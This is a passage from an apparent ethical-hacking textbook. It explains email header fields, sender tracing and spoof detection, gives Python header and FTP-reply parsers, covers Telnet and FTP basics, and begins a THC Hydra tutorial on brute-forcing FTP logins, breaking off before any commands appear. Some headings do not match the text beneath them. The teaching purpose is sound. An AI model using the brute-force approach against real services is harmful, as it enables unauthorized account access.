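        attrs.append(f"Max-Age={int(max_age)}")
    return "; ".join(attrs)


if __name__ == "__main__":
    store = SessionStore()
    victim, attacker = "203.0.113.10", "198.51.100.7"   # constructed addresses
    pre_login = store.create(victim)
    sid = store.login(pre_login, victim, "alice")
    print("pre-login id after login:", store.lookup(pre_login, victim))   # None
    print("stolen id from attacker:", store.lookup(sid, attacker))        # None
    print("genuine user:", store.lookup(sid, victim))                      # alice
    print("Set-Cookie:", set_cookie_header(sid, max_age=900))
```

The IP check is deliberately the weakest of the three: it rejects a replay from a different network but not from a neighbour behind the same NAT, which is exactly the open Wi-Fi case, so it complements regeneration and the Secure flag rather than replacing them.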
6. FROM THE MAIL SERVER
Databases are the heart of a commercial website. An attack on the
database servers can cause great monetary loss for the company; database
servers are usually attacked to obtain credit card information. A single
successful attack on a commercial site damages its reputation and costs
it customers, who expect their credit card data to be kept secure. [62]
9.2. Email headers of various email service providers
9.2.1. Email header [63]
The email header is the information that travels with every email,
containing details about the sender, the route and the receiver. It is
like a flight ticket: it tells you who booked it (who sent the email),
the departure information (when the email was sent), the route (from
where it was sent and how it reached you) and the arrival details (who
the receiver is and when it was received). And just as a flight ticket
can be booked under a false identity, the sender can partially fake these
details, pretending that the email was sent from a different account
(common practice for spammers and viruses). The lines added by the
receiving servers along the way are the part the sender cannot rewrite.
9.2.2. How do you see an email header?
It depends on your email service. Methods to see the email header:
1. Check the email header in Gmail
i. Open the mail whose header you want to see.
ii. On the right side there are two links: Show details and Reply.
iii. Next to the Reply link there is a drop-down menu; click it and a
menu list appears. Click the Show original option.
[62] http://ethicalhackerszone.blogspot.in/2012/07/email-hacking.html
[63] http://www.emailaddressmanager.com/tips/header.html
Figure 9.1: Checking Email Header
iv. The headers appear in a new window, as below:
Delivered-To: madhu.itgirl@gmail.com
Received: by 10.103.251.18 with SMTP id d18cs63161mus;
        Fri, 12 Dec 2008 22:49:50 -0800 (PST)
Received: by 10.142.191.5 with SMTP id o5mr1713828wff.349.1229150988588;
        Fri, 12 Dec 2008 22:49:48 -0800 (PST)
Return-Path: <bam_kumar@yahoo.co.in>
Received: from web8408.mail.in.yahoo.com (web8408.mail.in.yahoo.com [202.43.219.156])
        by mx.google.com with SMTP id 27si4917797wfa.9.2008.12.12.22.49.45;
        Fri, 12 Dec 2008 22:49:47 -0800 (PST)
Received-SPF: neutral (google.com: 202.43.219.156 is neither permitted nor denied
        by domain of bam_kumar@yahoo.co.in) client-ip=202.43.219.156;
DomainKey-Status: good (test mode)
Authentication-Results: mx.google.com; spf=neutral (google.com: 202.43.219.156 is
        neither permitted nor denied by domain of bam_kumar@yahoo.co.in)
        smtp.mail=bam_kumar@yahoo.co.in; domainkeys=pass (test mode)
        header.From=bam_kumar@yahoo.co.in
Received: (qmail 3052 invoked by uid 60001); 13 Dec 2008 06:49:44 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.co.in;
        h=X-YMail-OSG:Received:X-Mailer:Date:From:Reply-To:Subject:To:MIME-Version:Content-Type:Message-ID;
        b=xg5trRzbHxp4yLC6psh5mlZ0atalSpD8KqbgPPDylK6M2fa02ags6j9wYHrQOoqiBeS9CJB6zjgQpdljyDwXzzt+N6jSrXI62DZypgIFpMCB2eBsx1GjrPIk/95osByfIKwf99wumBu1tWckNs4H7BuIWqMAY0tjIKe+quWpaB8=;
X-YMail-OSG: N1_an9AVM1m0WfzSSQl.Wbr5qsT0O7aaCZ2FZdGVKPaSe2XibQc_rgNAUfqpcovokzz_ZCdizVbZqogM55GTObUsSHv_6dF531Vh5vdJePKyCew8cH_HqysheUXse1AvceoyNqEo5S9htPBHqpa8iLRb_xzzs1wt8a22Uq9XVHsj0mwfCnTy2Q.Wd6omlSStdy5XMnESx38MvAPlXUa4MG2oqnaRjG35gvAtg95QMO_tuZGD3g--
Received: from [59.94.42.254] by web8408.mail.in.yahoo.com via HTTP;
        Sat, 13 Dec 2008 12:19:44 IST
X-Mailer: YahooMailWebService/0.7.260.1
Date: Sat, 13 Dec 2008 12:19:44 +0530 (IST)
From: Adarshkumar <bam_kumar@yahoo.co.in>
Reply-To: bam_kumar@yahoo.co.in
Subject: CCNA Security
To: MadhuKumari <madhu_great_girl@yahoo.co.in>, MadhuKumari <madhu.itgirl@gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1692875076-1229150984=:3032"
Message-ID: <521154.3032.qm@web8408.mail.in.yahoo.com>
2. Email headers in Yahoo
i. In Yahoo Mail, open the received mail; the Show header option is at
the bottom right corner of the message.
9.2.3. How to read email headers
A. Time
Each timestamp in a header carries its own time zone offset, so compare
times only after converting them to one zone. In the sample above the
Gmail servers stamp in PST and the Yahoo servers in IST; Indian Standard
Time is 5 hours 30 minutes ahead of Greenwich Mean Time.
IST Indian Standard Time (GMT +05:30)
PST Pacific Standard Time (GMT -08:00)
GMT Greenwich Mean Time (GMT +00:00)
B. List of Common Headers
Apparently-To: Messages with many recipients sometimes have a
long list of headers of the form "Apparently-To: rth@bieberdorf.edu"
(one line per recipient). These headers are unusual in legitimate
mail; they are normally a sign of a mailing list and in recent times
mailing lists have generally used software sophisticated enough
not to generate a giant pile of headers.
Bcc: (stands for "Blind Carbon Copy") If you see this header on
incoming mail, something is wrong. It's used like Cc: (see below),
but does not appear in the headers. The idea is to be able to send
copies of email to persons who might not want to receive replies or
to appear in the headers. Blind carbon copies are popular with
spammers, since it confuses many inexperienced users to get email
that doesn't appear to be addressed to them.
Cc: (stands for "Carbon Copy", which is meaningful if you
remember typewriters) This header is sort of an extension of "To:".
It specifies additional recipients. The difference between "To:" and
"Cc:" is essentially connotative; some mailers also deal with them
differently in generating replies.
Comments: This is a nonstandard, free-form header field. It's most
commonly seen in the form "Comments: Authenticated sender is
<rth@bieberdorf.edu>". A header like this is added by some mailers
(notably the popular freeware program Pegasus) to identify the
sender; however, it is often added by hand (with false information)
by spammers as well. Treat with caution.
Content-Transfer-Encoding: This header relates to MIME, a
standard way of enclosing non-text content in email. It has no
direct relevance to the delivery of mail, but it affects how MIME-
compliant mail programs interpret the content of the message.
Content-Type: Another MIME header, telling MIME-compliant
mail programs what type of content to expect in the message.
Date: This header does exactly what you'd expect: It specifies a
date, normally the date the message was composed and sent. If
this header is omitted by the sender's computer, it might
conceivably be added by a mail server or even by some other
machine along the route. It shouldn't be treated as gospel truth;
forgeries aside, there are an awful lot of computers in the world
with their clocks set wrong.
Errors-To: Specifies an address for mailer-generated errors, like
"no such user" bounce messages, to go to (instead of the sender's
address). This is not a particularly common header, as the sender
usually wants to receive any errors at the sending address, which
is what most (essentially all) mail server software does by default.
From (without colon): the "envelope from", i.e. the sender address given
in the SMTP transaction; the receiving server records it as Return-Path:.
From: (with colon): the "message from", the author address that the mail
program displays. The two need not match; the envelope from is what SPF
checks, while the displayed From: is what a spoofer forges.
Message-Id: (also Message-id: or Message-ID:) The Message-Id is a
more-or-less unique identifier assigned to each message, usually
by the first mail server it encounters. Conventionally, it is of the
form "gibberish@bieberdorf.edu", where the "gibberish" part could
be absolutely anything and the second part is the name of the
machine that assigned the ID. Sometimes, but not often, the
"gibberish" includes the sender's username. Any email in which the
message ID is malformed (e.g. an empty string or no @ sign), or in
which the site in the message ID isn't the real site of origin, is
probably a forgery.
In-Reply-To: gives the Message-ID of the message being replied to, so
that mail programs can thread a conversation. Every modern mail client
adds it to replies, so its presence is normal; it is absent from new
(non-reply) messages. Spammers have been known to add a forged one,
probably in an attempt to pass filters that favour replies.
Mime-Version: (also MIME-Version:) Yet another MIME header,
this one just specifying the version of the MIME protocol that was
used by the sender. Like the other MIME headers, this one is
usually eminently ignorable; most modern mail programs will do
the right thing with it.
Newsgroups: This header only appears in email that is connected
with Usenet---either email copies of Usenet postings, or email
replies to postings. In the first case, it specifies the newsgroup(s) to
which the message was posted; in the second, it specifies the
newsgroup(s) in which the message being replied to was posted.
The semantics of this header are the subject of a low-intensity holy
war, which effectively assures that both sets of semantics will be
used indiscriminately for the foreseeable future.
Organization: A completely free-form header that normally
contains the name of the organization through which the sender of
the message has net access. The sender can generally control this
header, and silly entries like "Royal Society for Putting Things on
Top of Other Things" are commonplace.
Priority: An essentially free-form header that assigns a priority to
the mail. Most software ignores it. It is often used by spammers,
usually in the form "Priority: urgent" (or something similar), in an
attempt to get their messages read.
Received: one line added by each mail server that handled the message,
newest at the top; the bottommost line names the first server to accept
the message and the address it received it from (see 9.3.2 below).
References: lists the Message-IDs of the whole thread a message belongs
to, the "upstream" messages to which it is a response. On Usenet it has
always been used this way; in email it is likewise standard in replies
and carries the Message-ID of the post or mail being responded to as
well as the references copied from it.
Reply-To: Specifies an address for replies to go to. Though this
header has many legitimate uses (perhaps your software mangles
your “From:” address and you want replies to go to a correct
address), it is also widely used by spammers to deflect criticism.
Occasionally a naive spammer will actually solicit responses by
email and use the Reply-To: header to collect them, but more often
the Reply-To: address in junk email is either invalid or an innocent
victim.
Sender: identifies who actually transmitted the message when that
differs from the author given in From:, for example a secretary sending
on a manager's behalf or a mailing list redistributing a post. It is not
common in ordinary email (X-Sender: is seen more often) but appears in
copies of Usenet posts, where it is a more reliable identifier than the
"From:" line. In email it can be forged as easily as any other header.
Subject: A completely free-form field specified by the sender,
intended of course to describe the subject of the message.
To: The "message to:" header, i.e. the recipients the author lists. Note
that the To: header need not contain the actual recipient's address; the
envelope recipient, not this header, is what delivers the mail.
X-headers are the generic term for headers starting with a capital
X and a hyphen. The convention is that X-headers are
nonstandard and provided for information only and that,
conversely, any nonstandard informative header should be given a
name starting with "X-". This convention is frequently violated.
X-Confirm-Reading-To: This header requests an automated
confirmation notice when the message is received or read. It is
typically ignored; presumably some software acts on it.
X-Distribution: In response to problems with spammers using his
software, the author of Pegasus Mail added this header. Any
message sent with Pegasus to a sufficiently large number of
recipients has a header added that says "X-Distribution: bulk". It is
explicitly intended as something for recipients to filter against.
X-Errors-To: Like Errors-To:, this header specifies an address for
errors to be sent to. It is probably less widely obeyed.
X-Mailer: (also X-mailer:) A freeform header field intended for the
mail software used by the sender to identify itself (as advertising or
whatever). Since much junk email is sent with mailers invented for
the purpose, this field can provide much useful fodder for filters.
X-PMFLAGS: This is a header added by Pegasus Mail; its semantics are not
obvious. It appears in any message sent with Pegasus, so it does not
convey any information to the recipient that is not already covered by
the X-Mailer: header.
X-Priority: Another priority field, used notably by Eudora to
assign a priority (which appears as a graphical notation on the
message).
X-Sender: The usual email analogue to the Sender: header in
Usenet news, this header purportedly identifies the sender with
greater reliability than the from: header. In fact, it is nearly as easy
to forge, and should therefore be viewed with the same sort of
suspicion as the from: header.
X-UIDL: This is a unique identifier used by the POP protocol for
retrieving mail from a server. It is normally added between the
recipient's mail server and the recipient's actual mail software; if
mail arrives at the mail server with an X-UIDL: header, it is
probably junk (there's no conceivable use for such a header, but
for some unknown reason many spammers add one).
9.3. Trace the email sender
9.3.1. Identifying a fake mail
To identify a fake mail, follow these steps (Gmail is used as the
example):
1. Log in to your account with your username and password.
2. Open the specific mail.
3. Go to the header of that mail.
4. To open the header in Gmail:
A) First take the header of a genuine mail
i. Go to Reply and click the drop-down menu.
ii. Click Show original.
iii. A new window appears containing the header of that mail.
Figure 9.2: Genuine mail
iv. In the same way, open the header of the fake mail.
Figure 9.3: Fake mail
v. To decide whether a mail is fake or genuine, compare the headers of
the two mails field by field; the arrows in the fake header mark the
fields that differ.
vi. The two headers, supposedly from the same user, will differ.
vii. The differences vary from service to service, so they are not the
same every time.
viii. Whenever you open a header, look at the following fields:
a) Return-Path
b) Received: from
c) X-Mailer
d) Message-ID
e) X-Originating-IP
Figure 9.4: Header of genuine mail
ix. Match the two headers; the differences are highlighted below.
Figure 9.5: Header of Fake mail
9.3.2. Trace email sender [64]
Internet email is designed to carry the IP address of the computer from
which it was sent: each mail server that handles the message records the
address it received it from in a Received: line, and these lines are
delivered to the recipient along with the message. Email headers can be
thought of as the envelope of a postal letter: they contain the
electronic equivalent of addressing and postmarks that reflect the
routing of the mail from source to destination.
A) Finding IP Addresses in Email Headers
i. Look for lines starting with "Received: from". There are usually
several, because every mail server that handled the message adds its own
Received: line at the top, so the header records the whole route.
ii. The Received: lines are therefore in reverse order: the topmost was
added by your own mail server, the bottommost by the first server that
accepted the message. To find the computer that originally sent the
email, take the bottommost "Received: from" line and follow it across.
In square brackets is the IP address the receiving server saw the
connection come from; the name before the brackets is claimed by the
sender and can be forged, but the bracketed address was recorded by the
server itself.
iii. For example:
"Received: from myserver1.myemailserver.com (myserver1.myemailserver.com
[192.0.2.8])"
(192.0.2.8 is a reserved documentation address used here as a
placeholder.) If more than one "Received: from" line carries a bracketed
IP address, the sender is the last one listed. Treat lines below the one
added by a server you trust with caution: a spammer can prepend fake
Received: lines of his own before sending.
iv. Some providers instead, or in addition, record the sender's address
in an "X-Originating-IP" header.
v. Once you know the originating IP address, check its location with a
geolocation service such as IP2Location, Domain Tools or
www.dnsstuff.com.
[64] http://compnetworking.about.com/od/workingwithipaddresses/qt/ipaddressemail.htm
vi. If you want more specific details, such as the full address of the
email sender, you can try the email trace service at ipligence.com.
They charge a fee, but sometimes it is worth it.
vii. You can also go to the ARIN website to search for the IP address
and find out who it belongs to. ARIN is the American Registry for
Internet Numbers; you do not need an account or have to pay a fee for a
quick search.
viii. Copy the IP address into the box at the top right-hand corner of
the page where it reads "Search WHOIS" and click "Search".
ix. Read the information on the results page. It gives the organization
or individual to whom the IP address used to send the original email is
allocated (the network operator, not necessarily the individual sender).
x. You can also trace the sender online with the help of the following
links, which provide an email tracing facility:
http://www.ip-adress.com/trace_email/
http://www.johnru.com/active-whois/trace-email.html
http://whatismyipaddress.com/staticpages/index.php/trace-email-source-IP-address
http://www.usus.org/elements/tracing.htm
B) Internet Email Services and IP Addresses
Finally, the popular Internet-based email services differ in how much of
the sender's address they reveal in the headers. Use these tips, and
always check the actual headers, since providers change this behaviour
over time.
i. Mail sent from Gmail's web interface does not carry the sender's IP
address; the bottommost Received: line shows only Google's own mail
server, so the sender's true address cannot be recovered from such a
mail. (Mail submitted to Gmail from a desktop client over SMTP does
record the client's address in a Received: line.)
ii. Microsoft's Hotmail historically added an extended header line,
"X-Originating-IP", containing the sender's actual IP address.
iii. Emails sent from Yahoo's web interface (if untampered) carry the
sender's IP address in the last Received: entry, as in the sample header
earlier in this chapter.
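Reading a header the way 9.2.3 and 9.3 describe, as an added Python example rather than code from this book: it walks the Received: chain from the bottom up to recover the originating address, converts the Date: field to UTC so that timestamps stamped in different zones can be compared, and collects the fields 9.3.1 says to compare, flagging the mismatches that separate a forged mail from a genuine one. The first sample is abbreviated from the Yahoo-to-Gmail header shown earlier; the second is a constructed spoof using documentation addresses and example domains, not a real message.

```python
"""Read a header the way 9.2.3 and 9.3 describe: walk the Received:
chain from the bottom up for the originating address, convert Date: to
UTC so timestamps in different zones compare, and gather the fields
9.3.1 says to compare. Example code, not from the original text."""
import email
import email.utils
import re
from datetime import timezone

# Sample 1: abbreviated from the Yahoo-to-Gmail header shown earlier.
GENUINE = """\
Return-Path: <bam_kumar@yahoo.co.in>
Received: from web8408.mail.in.yahoo.com (web8408.mail.in.yahoo.com [202.43.219.156])
        by mx.google.com with SMTP id 27si4917797wfa.9.2008.12.12.22.49.45;
        Fri, 12 Dec 2008 22:49:47 -0800 (PST)
Authentication-Results: mx.google.com; spf=neutral (google.com: 202.43.219.156 is
        neither permitted nor denied by domain of bam_kumar@yahoo.co.in)
        smtp.mail=bam_kumar@yahoo.co.in; domainkeys=pass (test mode) header.From=bam_kumar@yahoo.co.in
Received: (qmail 3052 invoked by uid 60001); 13 Dec 2008 06:49:44 -0000
Received: from [59.94.42.254] by web8408.mail.in.yahoo.com via HTTP;
        Sat, 13 Dec 2008 12:19:44 IST
X-Mailer: YahooMailWebService/0.7.260.1
Date: Sat, 13 Dec 2008 12:19:44 +0530 (IST)
From: Adarshkumar <bam_kumar@yahoo.co.in>
Message-ID: <521154.3032.qm@web8408.mail.in.yahoo.com>

"""
# Sample 2: a constructed spoof (documentation addresses and example
# domains, not a real message). The visible From: claims a bank; the
# envelope sender, the SPF result and the Message-ID host say otherwise.
FAKE = """\
Return-Path: <bounce@bulk-relay.example.net>
Received: from bulk-relay.example.net (bulk-relay.example.net [198.51.100.23])
        by mx.google.com with ESMTP id 9si112233abc.4.2013.05.02.03.04.05;
        Thu, 02 May 2013 03:04:05 -0700 (PDT)
Authentication-Results: mx.google.com; spf=fail (google.com: domain of
        alerts@example-bank.com does not designate 198.51.100.23 as permitted sender)
        smtp.mail=alerts@example-bank.com
Received: from [203.0.113.45] by bulk-relay.example.net with HTTP;
        Thu, 02 May 2013 15:33:58 +0530
X-Mailer: PHPMailer
Date: Thu, 02 May 2013 15:33:58 +0530
From: Example Bank Alerts <alerts@example-bank.com>
Message-ID: <20130502100358.A1B2C3@bulk-relay.example.net>

"""
BRACKET_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HOSTNAME = r"[\w-]+(?:\.[\w-]+)+"


def received_hops(raw):
    """Received: hops oldest first (bottom of the header first), as
    (claimed_from, recorded_ip, by). Only the bracketed IP was recorded
    by the receiving server; the name before it is what the sender
    claimed, and hops below a server you trust can be fabricated."""
    msg = email.message_from_string(raw)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())            # unfold continuation lines
        m_from = re.match(r"from\s+(\S+)", value)
        m_by = re.search(r"\bby\s+(" + HOSTNAME + ")", value)
        m_ip = BRACKET_IP.search(value)
        hops.append((m_from.group(1).strip("[]") if m_from else None,
                     m_ip.group(1) if m_ip else None,
                     m_by.group(1) if m_by else None))
    return hops


def originating_ip(raw):
    """Bottommost 'Received: from' carrying a bracketed address (9.3.2)."""
    return next((ip for _, ip, _ in received_hops(raw) if ip), None)


def header_summary(raw):
    """The fields 9.3.1 compares, plus what the receiving server recorded."""
    msg = email.message_from_string(raw)
    auth = " ".join(msg.get("Authentication-Results", "").split())
    spf = re.search(r"\bspf=(\w+)", auth)
    dkim = re.search(r"\b(?:dkim|domainkeys)=(\w+)", auth)
    msgid = msg.get("Message-ID", "").strip()
    date = email.utils.parsedate_to_datetime(msg["Date"]) if msg["Date"] else None
    return {
        "from": email.utils.parseaddr(msg.get("From", ""))[1],
        "return_path": email.utils.parseaddr(msg.get("Return-Path", ""))[1],
        "spf": spf.group(1) if spf else None,
        "dkim": dkim.group(1) if dkim else None,
        "message_id_host": msgid.rsplit("@", 1)[1].rstrip(">") if "@" in msgid else None,
        "x_mailer": msg.get("X-Mailer"),
        "originating_ip": originating_ip(raw),
        "date_utc": date.astimezone(timezone.utc).isoformat() if date else None,
    }


def spoof_indicators(raw):
    """Header differences of the kind figures 9.4 and 9.5 highlight. An
    empty list means nothing was found, not that the mail is genuine."""
    s = header_summary(raw)
    from_dom = s["from"].rpartition("@")[2].lower()
    rp_dom = s["return_path"].rpartition("@")[2].lower()
    signs = []
    if from_dom and rp_dom and from_dom != rp_dom:
        signs.append(f"From domain {from_dom} differs from Return-Path domain {rp_dom}")
    if s["spf"] in ("fail", "softfail"):
        signs.append(f"SPF {s['spf']} for {s['return_path'] or s['from']}")
    if s["dkim"] == "fail":
        signs.append("DKIM/DomainKeys signature failed")
    if not s["message_id_host"]:
        signs.append("Message-ID missing or malformed")
    return signs


if __name__ == "__main__":
    for label, raw in (("genuine", GENUINE), ("fake", FAKE)):
        print(label, header_summary(raw), spoof_indicators(raw) or "no indicators")
```

Note that the genuine Yahoo mail has a Message-ID host (web8408.mail.in.yahoo.com) that is not the From: domain (yahoo.co.in); large providers do this routinely, which is why the example reports the host for a human to compare against a known-good mail rather than treating the mismatch as proof of forgery.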
CHAPTER 10
TELNET AND FTP
Objective
10.1 Introduction of Telnet
10.2 Uses of FTP
10.3 Anonymous FTP login
10.4 Website Defacement
10.1 Introduction to Telnet
Telnet (teletype network) is a network protocol used on the Internet or
on local area networks to provide a bidirectional interactive text
communication facility. [65] Typically, telnet provides access to a
command-line interface on a remote host via a virtual terminal
connection, which consists of an 8-bit byte-oriented data connection
over the Transmission Control Protocol (TCP). User data is interspersed
in-band with Telnet control information.
The term telnet may also refer to the software that implements the client
part of the protocol. Telnet client applications are available for virtually
all computer platforms. Most network equipment and operating systems
with a TCP/IP stack support a Telnet service for remote configuration
(including systems based on Windows NT). Because of security issues
with Telnet, its use has waned in favor of SSH for remote access.
"To telnet" means to establish a connection with the Telnet protocol,
either with a command-line client or through a programmatic interface.
For example, a common directive might be: "To change your password,
telnet to the server, log in and run the passwd command." Most often, a
user telnets to a Unix-like server system or a network device such as a
router and obtains a login prompt to a command-line text interface or a
character-based full-screen manager.
On many systems, a Telnet client application may also be used to
establish interactive raw TCP sessions. It is commonly believed that a
Telnet session which does not use the IAC byte (character 255) is
functionally identical to a raw TCP session. This is not the case,
because there are other network virtual terminal (NVT) rules, such as
the requirement for a bare carriage return character (CR, ASCII 13) to
be followed by a NULL (ASCII 0) character, that distinguish the Telnet
protocol from raw TCP sessions.
[65] http://wiki.wdlxtv.com/Telnet_and_ssh_remote_connections
Telnet is a client-server protocol, based on a reliable connection-oriented
transport. Typically this protocol is used to establish a connection to
Transmission Control Protocol (TCP) port number 23, where a Telnet
server application is listening. Telnet, however, predates TCP/IP and was
originally run over Network Control Program (NCP) protocols.
10.1.1 Use of Telnet
Logging in as a remote terminal
Telnet is a program to let you login to another computer on the Internet.
In most cases you must have a valid, authorized username and password
for the remote machine, although there are a few public services which
let anyone log in.
Connecting
Before you start, you need to know the Internet name (or the numeric IP
address) of the machine you want to log into.
The names of machines are usually in the format machine.site.network,
for example rtfm.mit.edu, but you can also use the numeric (IP) address
if you know it (four numbers separated by dots, e.g. 18.70.0.209). Note
that some countries add a fourth, and sometimes even a fifth, element to
the name, e.g.juno.cs.soton.ac.uk.
To connect, type the command telnet followed by the machine name or IP
address, e.g.
telnet wotcha.umb.edu
The remote machine responds with the login prompt (and sometimes a
warning message about remote usage). Log in as normal: give your
username, press Enter, then type your password and press Enter again.
From then on it is exactly as if you were logged in, sitting at their
site. Remember that Telnet encrypts nothing: the username, the password
and everything typed afterwards cross the network in cleartext and can
be read by anyone able to capture the traffic, which is why SSH should
be used instead wherever it is available.
Don't forget to log out when you have finished!
Graphical Telnet programs for windowing systems usually let you store
frequently-used addresses and retrieve them from a menu so you don't
have to retype them every time. In these cases, it is probably not a good
idea to store the passwords as well; otherwise anyone who can use your
computer would also be able to log in to your remote sites as well.
10.2 Uses of FTP
File Transfer Protocol (FTP) is a standard network protocol used to
exchange and manipulate files over a TCP/IP-based network, such as the
Internet. [66] FTP is built on a client-server architecture and uses
separate control and data connections between the client and server
applications. Applications were originally interactive command-line
tools with standardized command syntax, but graphical user interfaces
have been developed for all desktop operating systems in use today. FTP
is also often used as an application component to transfer files
automatically for a program's internal functions. FTP can be used with
user-based password authentication or with anonymous user access. The
Trivial File Transfer Protocol (TFTP) is a similar but simplified,
non-interoperable and unauthenticated relative of FTP.
Objectives of FTP
To promote sharing of files (computer programs and/or data).
To encourage indirect or implicit use of remote computers.
To shield a user from variations in file storage systems among
different hosts.
To transfer data reliably, and efficiently.
FTP runs over the Transmission Control Protocol (TCP). FTP servers
usually listen on the well-known port 21 (IANA-reserved) for incoming
connections from clients. A connection to this port from the FTP client
forms the control connection, on which commands are sent to the server
and replies are collected. FTP uses out-of-band control: directory
listings and file contents travel over separate data connections opened
on other port numbers. How the data connection is set up depends on the
requested transfer mode; in active mode the server opens it from its
port 20.
[66] en.wikipedia.org/wiki/File_Transfer_Protocol
In active mode, the FTP client opens a dynamic port, tells the server
that port number over the control connection (the PORT command) and
waits for the server to connect to it. When the server initiates the
data connection it binds its source port to port 20.
In passive mode (the PASV command), the FTP server opens a dynamic port
and sends the client, over the control connection, the IP address and
port to connect to. The port is a 16-bit value broken into a high and a
low byte, port = p1 * 256 + p2, in a reply such as "227 Entering Passive
Mode (h1,h2,h3,h4,p1,p2)". The client then connects from a dynamic port
of its own. Passive mode is what works through client-side firewalls and
NAT, since the client initiates both connections.
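The port arithmetic for both modes, as an added Python example (not code from this book): a parser for the 227 passive-mode reply, a builder for the active-mode PORT command, and the check a careful client makes before following a 227 reply, since a server or a tamperer on the control connection can advertise a third host's address and turn the client into a connection proxy. The addresses are private or documentation ranges chosen for the example; in real clients the standard library's ftplib.parse227 does the reply parsing.

```python
"""Active and passive FTP data connections. In both modes the data port
travels over the control connection as six decimal numbers: four for the
IPv4 address and two for the port, port = p1 * 256 + p2. Example code,
not from the original text (ftplib.parse227 does the passive-reply
parsing in real clients)."""
import re

PASV_REPLY = re.compile(r"^227\b.*?\((\d{1,3}(?:,\d{1,3}){5})\)")


def parse_pasv_reply(line: str):
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' -> (host, port).
    Rejects anything else, including octets or port bytes above 255."""
    m = PASV_REPLY.match(line.strip())
    if not m:
        raise ValueError(f"not a 227 reply: {line!r}")
    nums = [int(n) for n in m.group(1).split(",")]
    if any(n > 255 for n in nums):
        raise ValueError(f"byte out of range in {line!r}")
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def port_command(host: str, port: int) -> str:
    """Active mode: the client listens on `port` and tells the server
    where to connect back with 'PORT h1,h2,h3,h4,p1,p2'. The server then
    connects from its port 20 to this port, so the client side must
    accept an inbound connection, which is what breaks behind NAT."""
    octets = host.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address {host!r}")
    if not 1 <= port <= 65535:
        raise ValueError(f"bad port {port}")
    return f"PORT {','.join(octets)},{port // 256},{port % 256}"


def safe_pasv_target(control_peer: str, reply: str):
    """Check a client should make before connecting: the address in the
    227 reply should be the server we already talk to. A server, or
    someone tampering with the control connection, that advertises a
    different host is steering the client into opening a connection to a
    third party. Returns ((host, port), overridden): the data connection
    goes to the control peer's address, and the flag says whether the
    advertised address had to be ignored."""
    host, port = parse_pasv_reply(reply)
    return (control_peer, port), host != control_peer


if __name__ == "__main__":
    reply = "227 Entering Passive Mode (192,168,1,10,195,80)."
    print(parse_pasv_reply(reply))                       # ('192.168.1.10', 50000)
    print(port_command("192.168.1.5", 50001))            # PORT 192,168,1,5,195,81
    print(safe_pasv_target("192.168.1.10",
                           "227 Entering Passive Mode (203,0,113,9,195,80)"))
```

The override in safe_pasv_target is the behaviour most modern clients have adopted for exactly this reason; the flag is kept so that a proxy or monitoring tool can log the discrepancy rather than silently hide it.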
While data is being transferred via the data stream, the control stream
sits idle. This can cause problems with large data transfers through
firewalls which time out sessions after lengthy periods of idleness. While
the file may well be successfully transferred, the control session can be
disconnected by the firewall, causing an error to be generated.
The FTP protocol supports resuming of interrupted downloads using the
REST command. The client passes the number of bytes it has already
received as argument to the REST command and restarts the transfer. In
some command line clients for example, there is an often-ignored but
valuable command, "reget" (meaning "get again"), that will cause an
interrupted "get" command to be continued, hopefully to completion,
after a communications interruption.
While transferring data over the network, several data representations
can be used. The two most common transfer modes are:
ASCII mode: line endings are converted to the receiving system's
convention, so it is only safe for plain text; a binary file transferred
in ASCII mode is corrupted. (The FTP standard calls this "A" mode.)
Binary mode: the sending machine sends the file byte for byte and the
recipient stores the byte stream exactly as it receives it. (The FTP
standard calls this "IMAGE" or "I" mode.)
10.2.1 How to use FTP
To use FTP you need an FTP client program on your computer. One widely
used Windows client is SmartFTP (http://www.smartftp.com); many others
exist, and most operating systems also ship a command-line ftp client.
When you first launch the FTP program, a startup screen will appear.
This screen will enable you to add your website information and allow
the program to connect with your server. You simply fill in the
information where indicated with the following information:
Profile Name - This name will be added to the selection list of profile
names. Select your profile name according to your domain. For example,
if your domain name were smiths.com, your profile name might be
Smiths.
Host Name/Address - Your domain name address.
Example - www.candidinfo.com
Host Type - The type of server on which your website is hosted. The
usual value is UNIX, and the setting can normally be left at its
default (automatic detection).
User ID - Your hosting User ID. Example - candidinfo.
Password - Your hosting password.
Depending on which FTP client you use, the names may be slightly
different.
Once the FTP program has connected with your server, you will see the
files on your computer in the left window and the files on your server will
be displayed in the right window.
Transferring Files [67]
To maneuver through your folders, simply double click on them. To
transfer your files, either double click on the file or highlights it and then
click on the transfer files arrow.
Sometimes you will have to upload your files to a special directory,
such as WWW or public_html, but most providers let you upload the files
to the current directory. To select more than one file at a time, click
on each file you would like to transfer while holding down the Ctrl key
on your keyboard. Keep in mind that all of the files you select are
uploaded in the same mode; in other words, you can upload all of your
HTML files at the same time, or all of your images, but not a mixture.
If all of the files you'd like to upload are all together, you can click on the
first file while holding down your Shift key and use the down arrow on
your keyboard to highlight all of your files.Files such as text, HTML, and
most scripts should be uploaded to your server in ASCII mode. Any file
that isn't ASCII text, such as programs (EXE, ZIP), graphics, eBooks,
sounds (WAV, MID) and movies should be uploaded to your server in
Binary mode.
67
masteringwebhosting.com/ws-ftp-tutorial/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 156
Ethical Hacking Part I
10.2.2 Hacking an FTP Server Using THC Hydra
THC Hydra[68] is a fast network authentication cracker that supports
many different services. When you need to brute-force a remote
authentication service, Hydra is often the tool of choice. It can perform
rapid dictionary attacks against more than 30 protocols, including
telnet, ftp, http, https, smb, several databases, and many more. Like THC
Amap, it comes from The Hacker's Choice (THC).
This tutorial shows how to attack an FTP login with THC-Hydra, the fast
and flexible network login cracker.
Introduction
Passwords are the number one security hole, as every password security
study shows. Hydra is a parallelized login cracker that supports
numerous protocols to attack. New modules are easy to add; besides that,
it is flexible and very fast.
Currently this tool supports:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
